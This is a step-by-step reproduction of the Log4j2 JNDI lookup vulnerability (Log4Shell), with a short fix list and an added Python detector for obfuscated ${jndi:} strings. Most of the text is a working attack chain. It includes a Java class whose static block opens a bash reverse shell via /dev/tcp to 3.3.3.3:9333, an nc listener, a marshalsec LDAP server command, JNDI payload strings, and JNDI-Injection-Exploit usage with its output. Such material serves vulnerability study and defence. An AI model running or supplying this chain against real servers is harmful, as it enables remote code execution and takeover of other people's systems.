0x00 Vulnerable code using log4j2
JDK: 1.8.0_102
Tested: the issue could not be reproduced on 1.8.0_211.
pom.xml
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.0</version>
</dependency>
log4j.properties
##define an appender named console
log4j.appender.console=org.apache.log4j.ConsoleAppender
#The Target value is System.out or System.err
log4j.appender.console.Target=System.out
#set the layout type of the appender
log4j.appender.console.layout=org.apache.log4j.PatternLayout
#set the layout format pattern
log4j.appender.console.layout.ConversionPattern=[%-5p] %m%n
##define a logger
log4j.rootLogger=TRACE,console
Main.java
package testlog4j;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Main {
    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME);
        logger.error("hello world");
        logger.error("${java:version}");
        logger.error("${jndi:ldap://3.3.3.3:9999/TouchFile}");
    }
}
0x01
Exploit class:
// javac shell_re.java
import java.lang.Runtime;
import java.lang.Process;

public class shell_re {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "exec 5<>/dev/tcp/3.3.3.3/9333;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
Generate shell_re.class:
javac shell_re.java
Start an HTTP server in the current directory so the class can be fetched:
python2 -m SimpleHTTPServer 9980
Start the listener:
nc -lv 9333
0x02 Set up a JNDI LDAP server with marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://3.3.3.3:9980/#shell_re" 9999
0x03 Exploit
Run the code from 0x00; a reverse shell arrives on port 9333.
0x04 Fix
- Upgrade log4j2 to version 2.17.0
- Add the JVM startup parameter -Dlog4j2.formatMsgNoLookups=true
- Add a log4j2.component.properties file on the application classpath with the content log4j2.formatMsgNoLookups=true
- Use JDK 11.0.1, 8u191, 7u201, 6u211 or a later version
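Alongside patching, a defender will want to spot the lookup strings used above when they show up in request logs. The following detector is an added example, not code from the original post: it normalises the trivial nested lookups (`${lower:..}`, `${upper:..}`, `${x:-y}`) that are used to hide the `jndi` token and then reports the scheme and host of each JNDI lookup. The sample lines are constructed; the two `${jndi:...}` strings are the ones from this post.

```python
"""Detect Log4j2 JNDI lookup strings in log or request text (added example)."""
import re

# Innermost nested lookups that are commonly used to hide the literal "jndi".
_LOWER = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')       # ${env:NOPE:-j} -> j
# After normalisation, a JNDI lookup is ${jndi:<scheme>://<host[:port]>...
_JNDI = re.compile(r'\$\{jndi:([a-z]+)://([^/${}\s]+)', re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse innermost lower/upper/default lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(text: str):
    """Return (scheme, host:port) for every JNDI lookup found after normalising."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(text))]


# Constructed sample request lines (not captured from a real system).
SAMPLE_LINES = [
    'GET / HTTP/1.1 User-Agent: Mozilla/5.0',
    'GET / HTTP/1.1 User-Agent: ${jndi:ldap://3.3.3.3:9999/TouchFile}',
    'GET / HTTP/1.1 X-Api-Version: ${${lower:j}${upper:n}di:rmi://127.0.0.1:1099/30pi00}',
    'GET / HTTP/1.1 User-Agent: ${${env:NOPE:-j}ndi:ldap://127.0.0.1:1389/pc77qb}',
    'GET / HTTP/1.1 X-Note: ${java:version}',   # a lookup, but not a JNDI one
]


def scan(lines):
    """Map the index of each offending line to the JNDI lookups it carries."""
    return {i: hits for i, line in enumerate(lines) if (hits := find_jndi_lookups(line))}


if __name__ == '__main__':
    for idx, hits in scan(SAMPLE_LINES).items():
        print(idx, hits)
```

The hosts it returns are what you would feed to an egress block or alert on; `${java:version}` is deliberately left out because it never triggers a network lookup.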
0x05 Reproducing with JNDI-Injection-Exploit
- Run JNDI-Injection-Exploit to start the web service and the LDAP service
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
-C is the command to execute, -A is the IP address to listen on.
Current output:
[ADDRESS] >> 127.0.0.1
[COMMAND] >> /Applications/Calculator.app/Contents/MacOS/Calculator
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/gyzaiw
ldap://127.0.0.1:1389/gyzaiw
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/fkepkx
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/pc77qb
ldap://127.0.0.1:1389/pc77qb
----------------------------Server Log----------------------------
2021-12-23 15:18:00 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2021-12-23 15:18:00 [RMISERVER] >> Listening on 0.0.0.0:1099
2021-12-23 15:18:01 [LDAPSERVER] >> Listening on 0.0.0.0:1389
- Injected code
// use JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
logger.error("${jndi:ldap://127.0.0.1:1389/pc77qb}");
Tested: the command also executes successfully over the rmi protocol.
logger.error("${jndi:rmi://127.0.0.1:1099/30pi00}");
- Run it and the calculator opens
Note: when the command given to -C is a reverse shell and the vulnerable machine is a Mac, the shell does not come back. With Marshalsec it works.